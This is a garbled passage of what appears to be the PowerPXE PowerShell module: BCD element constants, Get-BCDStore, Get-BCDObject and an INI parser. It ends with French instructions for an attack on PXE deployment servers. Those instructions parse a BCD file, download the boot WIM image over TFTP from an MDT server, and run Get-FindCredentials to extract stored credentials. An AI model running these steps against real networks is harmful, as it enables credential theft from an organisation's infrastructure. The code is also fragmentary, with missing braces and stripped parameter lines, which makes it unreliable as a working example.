    'BootStatusDataLogPath' = ([UInt32] 0x12000044)
    'PreserveBootStat' = ([UInt32] 0x16000045)
    'GraphicsModeDisabled' = ([UInt32] 0x16000046)
    'ConfigAccessPolicy' = ([UInt32] 0x15000047)
    'NoIntegrityChecks' = ([UInt32] 0x16000048)
    'TestSigning' = ([UInt32] 0x16000049)
    'FontPath' = ([UInt32] 0x1200004A)
    'IntegrityServices' = ([UInt32] 0x1500004B)
    'VolumeBandId' = ([UInt32] 0x1500004C)
    'ExtendedInput' = ([UInt32] 0x16000050)
    'InitialConsoleInput' = ([UInt32] 0x15000051)
    'GraphicsResolution' = ([UInt32] 0x15000052)
    'RestartOnFailure' = ([UInt32] 0x16000053)
    'HighestMode' = ([UInt32] 0x16000054)
    'IsolatedContext' = ([UInt32] 0x16000060)
    'DisplayMessage' = ([UInt32] 0x15000065)
    'DisplayMessageOverride' = ([UInt32] 0x15000066)
    'NoBootUxLogo' = ([UInt32] 0x16000067)
    'NoBootUxText' = ([UInt32] 0x16000068)
    'NoBootUxProgress' = ([UInt32] 0x16000069)
    'NoBootUxFade' = ([UInt32] 0x1600006A)
    'BootUxReservePoolDebug' = ([UInt32] 0x1600006B)
    'BootUxDisabled' = ([UInt32] 0x1600006C)
    'BootUxFadeFrames' = ([UInt32] 0x1500006D)
    'BootUxDumpStats' = ([UInt32] 0x1600006E)
    'BootUxShowStats' = ([UInt32] 0x1600006F)
    'MultiBootSystem' = ([UInt32] 0x16000071)
    'NoKeyboard' = ([UInt32] 0x16000072)
    'AliasWindowsKey' = ([UInt32] 0x15000073)
    'BootShutdownDisabled' = ([UInt32] 0x16000074)
    'PerformanceFrequency' = ([UInt32] 0x15000075)
    'SecurebootRawPolicy' = ([UInt32] 0x15000076)
    'AllowedInMemorySettings' = ([UInt32] 0x17000077)
    'BootUxtTransitionTime' = ([UInt32] 0x15000079)
    'MobileGraphics' = ([UInt32] 0x1600007A)
    'ForceFipsCrypto' = ([UInt32] 0x1600007B)
    'BootErrorUx' = ([UInt32] 0x1500007D)
    'FlightSigning' = ([UInt32] 0x1600007E)
    'MeasuredBootLogFormat' = ([UInt32] 0x1500007F)
    'PassCount' = ([UInt32] 0x25000001)
    'FailureCount' = ([UInt32] 0x25000003)
    'SkipFFUMode' = ([UInt32] 0x26000202)
    'ForceFFUMode' = ([UInt32] 0x26000203)
    'ChargeThreshold' = ([UInt32] 0x25000510)
    'OffModeCharging' = ([UInt32] 0x26000512)
    'Bootflow' = ([UInt32] 0x25000AAA)
    'DisplayOrder' = ([UInt32] 0x24000001)
    'BootSequence' = ([UInt32] 0x24000002)
    'Default' = ([UInt32] 0x23000003)
    'Timeout' = ([UInt32] 0x25000004)
    'AttemptResume' = ([UInt32] 0x26000005)
    'ResumeObject' = ([UInt32] 0x23000006)
    'ToolsDisplayOrder' = ([UInt32] 0x24000010)
    'DisplayBootMenu' = ([UInt32] 0x26000020)
    'NoErrorDisplay' = ([UInt32] 0x26000021)
    'BcdDevice' = ([UInt32] 0x21000022)
    'BcdFilePath' = ([UInt32] 0x22000023)
    'ProcessCustomActionsFirst' = ([UInt32] 0x26000028)
    'CustomActionsList' = ([UInt32] 0x27000030)
    'PersistBootSequence' = ([UInt32] 0x26000031)
    'FileDevice' = ([UInt32] 0x21000001)
    'FilePath' = ([UInt32] 0x22000002)
    'DebugOptionEnabled' = ([UInt32] 0x26000006)
    'BootMenuPolicyWinResume' = ([UInt32] 0x25000008)
    'OSDevice' = ([UInt32] 0x21000001)
    'SystemRoot' = ([UInt32] 0x22000002)
    'AssociatedResumeObject' = ([UInt32] 0x23000003)
    'DetectKernelAndHal' = ([UInt32] 0x26000010)
    'KernelPath' = ([UInt32] 0x22000011)
    'HalPath' = ([UInt32] 0x22000012)
    'DbgTransportPath' = ([UInt32] 0x22000013)
    'NX' = ([UInt32] 0x25000020)
    'PAEPolicy' = ([UInt32] 0x25000021)
    'WinPE' = ([UInt32] 0x26000022)
    'DisableCrashAutoReboot' = ([UInt32] 0x26000024)
    'UseLastGoodSettings' = ([UInt32] 0x26000025)
    'AllowPrereleaseSignatures' = ([UInt32] 0x26000027)
    'NoLowMemory' = ([UInt32] 0x26000030)
    'RemoveMemory' = ([UInt32] 0x25000031)
    'IncreaseUserVa' = ([UInt32] 0x25000032)
    'UseVgaDriver' = ([UInt32] 0x26000040)
    'DisableBootDisplay' = ([UInt32] 0x26000041)
    'DisableVesaBios' = ([UInt32] 0x26000042)
    'DisableVgaMode' = ([UInt32] 0x26000043)
    'ClusterModeAddressing' = ([UInt32] 0x25000050)
    'UsePhysicalDestination' = ([UInt32] 0x26000051)
    'RestrictApicCluster' = ([UInt32] 0x25000052)
    'UseLegacyApicMode' = ([UInt32] 0x26000054)
    'X2ApicPolicy' = ([UInt32] 0x25000055)
    'UseBootProcessorOnly' = ([UInt32] 0x26000060)
    'NumberOfProcessors' = ([UInt32] 0x25000061)
    'ForceMaximumProcessors' = ([UInt32] 0x26000062)
    'ProcessorConfigurationFlags' = ([UInt32] 0x25000063)
    'MaximizeGroupsCreated' = ([UInt32] 0x26000064)
    'ForceGroupAwareness' = ([UInt32] 0x26000065)
    'GroupSize' = ([UInt32] 0x25000066)
    'UseFirmwarePciSettings' = ([UInt32] 0x26000070)
    'MsiPolicy' = ([UInt32] 0x25000071)
    'SafeBoot' = ([UInt32] 0x25000080)
    'SafeBootAlternateShell' = ([UInt32] 0x26000081)
    'BootLogInitialization' = ([UInt32] 0x26000090)
    'VerboseObjectLoadMode' = ([UInt32] 0x26000091)
    'KernelDebuggerEnabled' = ([UInt32] 0x260000a0)
    'DebuggerHalBreakpoint' = ([UInt32] 0x260000a1)
    'UsePlatformClock' = ([UInt32] 0x260000A2)
    'ForceLegacyPlatform' = ([UInt32] 0x260000A3)
    'TscSyncPolicy' = ([UInt32] 0x250000A6)
    'EmsEnabled' = ([UInt32] 0x260000b0)
    'DriverLoadFailurePolicy' = ([UInt32] 0x250000c1)
    'BootMenuPolicyWinload' = ([UInt32] 0x250000C2)
    'AdvancedOptionsOneTime' = ([UInt32] 0x260000C3)
    'BootStatusPolicy' = ([UInt32] 0x250000E0)
    'DisableElamDrivers' = ([UInt32] 0x260000E1)
    'HypervisorLaunchType' = ([UInt32] 0x250000F0)
    'HypervisorDebugEnabled' = ([UInt32] 0x260000F2)
    'HypervisorDebugType' = ([UInt32] 0x250000F3)
    'HypervisorDebugPort' = ([UInt32] 0x250000F4)
    'HypervisorBaudrate' = ([UInt32] 0x250000F5)
    'HypervisorDebug1394Channel' = ([UInt32] 0x250000F6)
    'BootUxPolicy' = ([UInt32] 0x250000F7)
    'HypervisorDebugBusParams' = ([UInt32] 0x220000F9)
    'HypervisorNumProc' = ([UInt32] 0x250000FA)
    'HypervisorRootProcPerNode' = ([UInt32] 0x250000FB)
    'HypervisorUseLargeVTlb' = ([UInt32] 0x260000FC)
    'HypervisorDebugNetHostIp' = ([UInt32] 0x250000FD)
    'HypervisorDebugNetHostPort' = ([UInt32] 0x250000FE)
    'TpmBootEntropyPolicy' = ([UInt32] 0x25000100)
    'HypervisorDebugNetKey' = ([UInt32] 0x22000110)
    'HypervisorDebugNetDhcp' = ([UInt32] 0x26000114)
    'HypervisorIommuPolicy' = ([UInt32] 0x25000115)
    'XSaveDisable' = ([UInt32] 0x2500012b)
    'RamdiskImageOffset' = ([UInt32] 0x35000001)
    'TftpClientPort' = ([UInt32] 0x35000002)
    'RamdiskSdiDevice' = ([UInt32] 0x31000003)
    'RamdiskSdiPath' = ([UInt32] 0x32000004)
    'RamdiskImageLength' = ([UInt32] 0x35000005)
    'RamdiskExportAsCd' = ([UInt32] 0x36000006)
    'RamdiskTftpBlockSize' = ([UInt32] 0x36000007)
    'RamdiskTftpWindowSize' = ([UInt32] 0x36000008)
    'RamdiskMulticastEnabled' = ([UInt32] 0x36000009)
    'RamdiskMulticastTftpFallback' = ([UInt32] 0x3600000A)
    'RamdiskTftpVarWindow' = ([UInt32] 0x3600000B)
    'DeviceType' = ([UInt32] 0x45000001)
    'ApplicationRelativePath' = ([UInt32] 0x42000002)
    'RamdiskDeviceRelativePath' = ([UInt32] 0x42000003)
    'OmitOsLoaderElements' = ([UInt32] 0x46000004)
    'ElementsToMigrate' = ([UInt32] 0x47000006)
    'RecoveryOs' = ([UInt32] 0x46000010)

function Get-BCDStore {

Opens a BCD store.


Get-BCDStore opens the system BCD store or a backup BCD file. All functions in this module that implement a -BCDStore parameter require the output of this function.

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause


Specifies the path to a BCD store backup file. The absense of this argument defaults to opening the system BCD store.


Specifies the CIM session to use for this function. Enter a variable that contains the CIM session or a command that creates or gets the CIM session, such as the New-CimSession or Get-CimSession cmdlets. For more information, see about_CimSessions.


$BCDStore = Get-BCDStore

Opens the system BCD store.


$BCDStore = Get-BCDStore -CimSession $CimSession

Opens a remote system BCD store using an established CIM session.


$BCDStore = Get-BCDStore -FilePath .\exportedstore.bin

Opens a BCD store for a specified file.



Accepts one of more CIM session objects.



Outputs a BcdStore object that is required for all subsequent calls to BCD module functions.

    param (

        [Parameter(ValueFromPipeline = $True)]

    BEGIN {
        # If a CIM session is not provided, trick the function into thinking there is one.
        if (-not $PSBoundParameters['CimSession']) {
            $CimSession = ''

        foreach ($Session in $CimSession) {
            $CimMethodArgs = @{}

            if ($Session.Id) { $CimMethodArgs['CimSession'] = $Session }

            if ($FilePath) {
                $BCDPath = (Resolve-Path $FilePath).Path
            } else {
                $BCDPath = ''

            $OpenStoreArg = @{
                Namespace = 'ROOT/WMI'
                ClassName = 'BcdStore'
                MethodName = 'OpenStore'
                Arguments = @{ File = $BCDPath }

            $OpenStoreResult = Invoke-CimMethod @OpenStoreArg @CimMethodArgs

            if ($True -eq $OpenStoreResult.ReturnValue) {
            } else {
                Write-Error 'Unable to open BCD store. Likely reason: You do not have the required permissions to open the BCD store.'

filter Get-BCDObject {

Retrieves defined BCD objects from a BCD store.


Get-BCDObject returns defined BCD objects from a previously opened BCD store. Upon retrieving one or more BCD objects, relevant BCD objects can be retrieved.

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause


Specifies the well-known BCD object identifier to be retrieved.


Specifies the BCD object identifier to be retrieved.


Returns BCD objects based on the specified raw object value. For example, 0x101FFFFF refers to firmware entries, specifically. 0x10200003 would refer to OS loader entries.


Specifies the BCDStore object returned from the Get-BCDStore function.


Get-BCDObject -BCDStore $BCDStore | Get-BCDElement

Retrieves all defined BCD objects from the specified BCD store. This is equivalent to the following bcdedit command:

bcdedit.exe /enum all


Get-BCDObject -BCDStore $BCDStore -WellKnownId BootMgr | Get-BCDElement

Retrieves all defined boot loader BCD objects from the specified BCD store. This is equivalent to the following bcdedit command:

bcdedit.exe /enum {bootmgr}


Get-BCDObject -BCDStore $BCDStore -Type 0x101FFFFF | Get-BCDElement

Retrieves all defined firmware BCD objects from the specified BCD store. This is equivalent to the following bcdedit command:

bcdedit.exe /enum firmware


Get-BCDObject -BCDStore $BCDStore -Id b5b5d3df-3847-11e8-a5cf-c49ded12be66 | Get-BCDElement

Retrieves the BCD object for the corresponding GUID. This is equivalent to the following bcdedit command:

bcdedit.exe /enum {b5b5d3df-3847-11e8-a5cf-c49ded12be66}



Accepts one of more CIM session objects.



Outputs one or more BcdObject objects.

    [CmdletBinding(DefaultParameterSetName = 'WellKnownId')]
    param (
        [Parameter(ParameterSetName = 'WellKnownId')]

        [Parameter(Mandatory, ParameterSetName = 'Id')]

        [Parameter(Mandatory, ParameterSetName = 'Type')]

        [Parameter(Mandatory, ValueFromPipeline)]

    # These object types will need to be mapped to a raw type value.
    $FriendlyObjectTypes = @('Inherit', 'Firmware', 'OSLoader', 'BootApp', 'Resume')

    $HasFriendlyObjectType = $False
    if ($FriendlyObjectTypes -contains $WellKnownId) { $HasFriendlyObjectType = $True }

    $CimMethodArgs = @{}
    $CimSessionComputerName = $BCDStore.GetCimSessionComputerName()

    if ($CimSessionComputerName) { $CimMethodArgs['CimSession'] = Get-CimSession -InstanceId $BCDStore.GetCimSessionInstanceId() }

    $GetObjectsResult = $null

    $BCDObjects = $null

    if ($WellKnownId -eq 'Active') {
        # equivalent to: bcdedit.exe /enum ACTIVE
        $BootMgr = Get-BCDObject -BCDStore $BCDStore -WellKnownId BootMgr

        if ($BootMgr) {

            $DisplayOrder = $BootMgr | Get-BCDElement -Name DisplayOrder

            if ($DisplayOrder -and ($DisplayOrder.Ids.Count)) {
                $DisplayOrder.Ids | ForEach-Object { Get-BCDObject -BCDStore $BCDStore -Id $_ }

    } elseif ($WellKnownId -and !$HasFriendlyObjectType) {
        $GetObjectsResult = Invoke-CimMethod -InputObject $BCDStore -MethodName OpenObject -Arguments @{ Id = $ObjectFriendlyNameMapping[$WellKnownId][0] } @CimMethodArgs
        if ($True -eq $GetObjectsResult.ReturnValue) { $BCDObjects = $GetObjectsResult.Object }
    } elseif ($Id) {
        $GetObjectsResult = Invoke-CimMethod -InputObject $BCDStore -MethodName OpenObject -Arguments @{ Id = "{$Id}" } @CimMethodArgs
        if ($True -eq $GetObjectsResult.ReturnValue) { $BCDObjects = $GetObjectsResult.Object }
    } elseif ($Type -or $HasFriendlyObjectType) {
        if ($HasFriendlyObjectType) {
            switch ($WellKnownId) {
                'Inherit'  { $TypeVal = 0x20000000 }
                'Firmware' { $TypeVal = 0x101FFFFF }
                'OSLoader' { $TypeVal = 0x10200003 }
                'BootApp'  { $TypeVal = 0x10200000 }
                'Resume'   { $TypeVal = 0x10200004 }
        } else {
            $TypeVal = $Type

        # Return all BCD objects of the specified type value.
        $GetObjectsResult = Invoke-CimMethod -InputObject $BCDStore -MethodName EnumerateObjects -Arguments @{ Type = $TypeVal } @CimMethodArgs

        if ($True -eq $GetObjectsResult.ReturnValue) { $BCDObjects = $GetObjectsResult.Objects }
    } else {
        # Return all defined BCD objects.
        $GetObjectsResult = Invoke-CimMethod -InputObject $BCDStore -MethodName EnumerateObjects -Arguments @{ Type = [UInt32] 0 } @CimMethodArgs

        if ($True -eq $GetObjectsResult.ReturnValue) { $BCDObjects = $GetObjectsResult.Objects }

    foreach ($Object in $BCDObjects) {
        # Break out the components of each object type and append them to each BCDObject.
        $ObjectType = $ObjectTypes[[Int] (($Object.Type -band 0xF0000000) -shr 28)]
        $InheritableByValue = [Int] (($Object.Type -band 0x00F00000) -shr 20)
        $InheritableBy = @{
            1 = 'AnyObject'
            2 = 'ApplicationObjects'
            3 = 'DeviceObjects'

        $ImageType = if ($ObjectType -eq 'Application') { $ImageTypes[$InheritableByValue] }
        $ApplicationTypeValue = [Int] $Object.Type -band 0x000FFFFF
        $ApplicationType = $null

        switch ($ObjectType) {
            'Inherit' { $ApplicationType = $InheritableTypes[$ApplicationTypeValue] }
            'Application' { $ApplicationType = $ApplicationTypes[$ApplicationTypeValue] }

        Add-Member -InputObject $Object -MemberType NoteProperty -Name ObjectType -Value $ObjectType
        Add-Member -InputObject $Object -MemberType NoteProperty -Name InheritableBy -Value $InheritableBy
        Add-Member -InputObject $Object -MemberType NoteProperty -Name ApplicationImageType -Value $ImageType
        Add-Member -InputObject $Object -MemberType NoteProperty -Name ApplicationType -Value $ApplicationType
        Add-Member -InputObject $Object -MemberType NoteProperty -Name Store -Value $BCDStore



    ## Author: Oliver Lipkau
    ## Name : PsIni 
    ## Github : 
    ## License: BSD 3-Clause

Function Get-IniContent {  
        Gets the content of an INI file  
        Gets the content of an INI file and returns it as a hashtable  
        Author        : Oliver Lipkau <>  
        Blog        :  
        Source        : 
        Version        : 1.0 - 2010/03/12 - Initial release  
                      1.1 - 2014/12/11 - Typo (Thx SLDR) 
                                         Typo (Thx Dave Stiff) 
        #Requires -Version 2.0  
    .Parameter FilePath  
        Specifies the path to the input file.  
        $FileContent = Get-IniContent "C:\myinifile.ini"  
        Saves the content of the c:\myinifile.ini in a hashtable called $FileContent  
        $inifilepath | $FileContent = Get-IniContent  
        Gets the content of the ini file passed through the pipe into a hashtable called $FileContent  
        C:\PS>$FileContent = Get-IniContent "c:\settings.ini"  
        Returns the key "Key" of the section "Section" from the C:\settings.ini file  
    #    {Write-Verbose "$($MyInvocation.MyCommand.Name):: Function started"}  
        #Write-Verbose "$($MyInvocation.MyCommand.Name):: Processing file: $Filepath"  
        $ini = @{}  
        switch -regex -file $FilePath  
            "^\[(.+)\]$" # Section  
                $section = $matches[1]  
                $ini[$section] = @{}  
                $CommentCount = 0  
            "^(;.*)$" # Comment  
                if (!($section))  
                    $section = "No-Section"  
                    $ini[$section] = @{}  
                $value = $matches[1]  
                $CommentCount = $CommentCount + 1  
                $name = "Comment" + $CommentCount  
                $ini[$section][$name] = $value  
            "(.+?)\s*=\s*(.*)" # Key  
                if (!($section))  
                    $section = "No-Section"  
                    $ini[$section] = @{}  
                $name,$value = $matches[1..2]  
                $ini[$section][$name] = $value  
        #Write-Verbose "$($MyInvocation.MyCommand.Name):: Finished Processing file: $FilePath"  
        Return $ini  
    #    {Write-Verbose "$($MyInvocation.MyCommand.Name):: Function ended"}  

On peut importer ce module :

Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile

Il va vous indiquer l'emplacement de l'image WIM :

>> Parse the BCD file: conf.bcd
>>>> Identify wim file : <PXE Boot Image Location>

On peut maintenant récupérer l'image WIM :

tftp -i <MDT_IP> GET "<PXE Boot Image Location>" pxeboot.wim

Et on peut chercher les identifiants de session qu'il y aurait dedans :

Get-FindCredentials -WimFile pxeboot.wim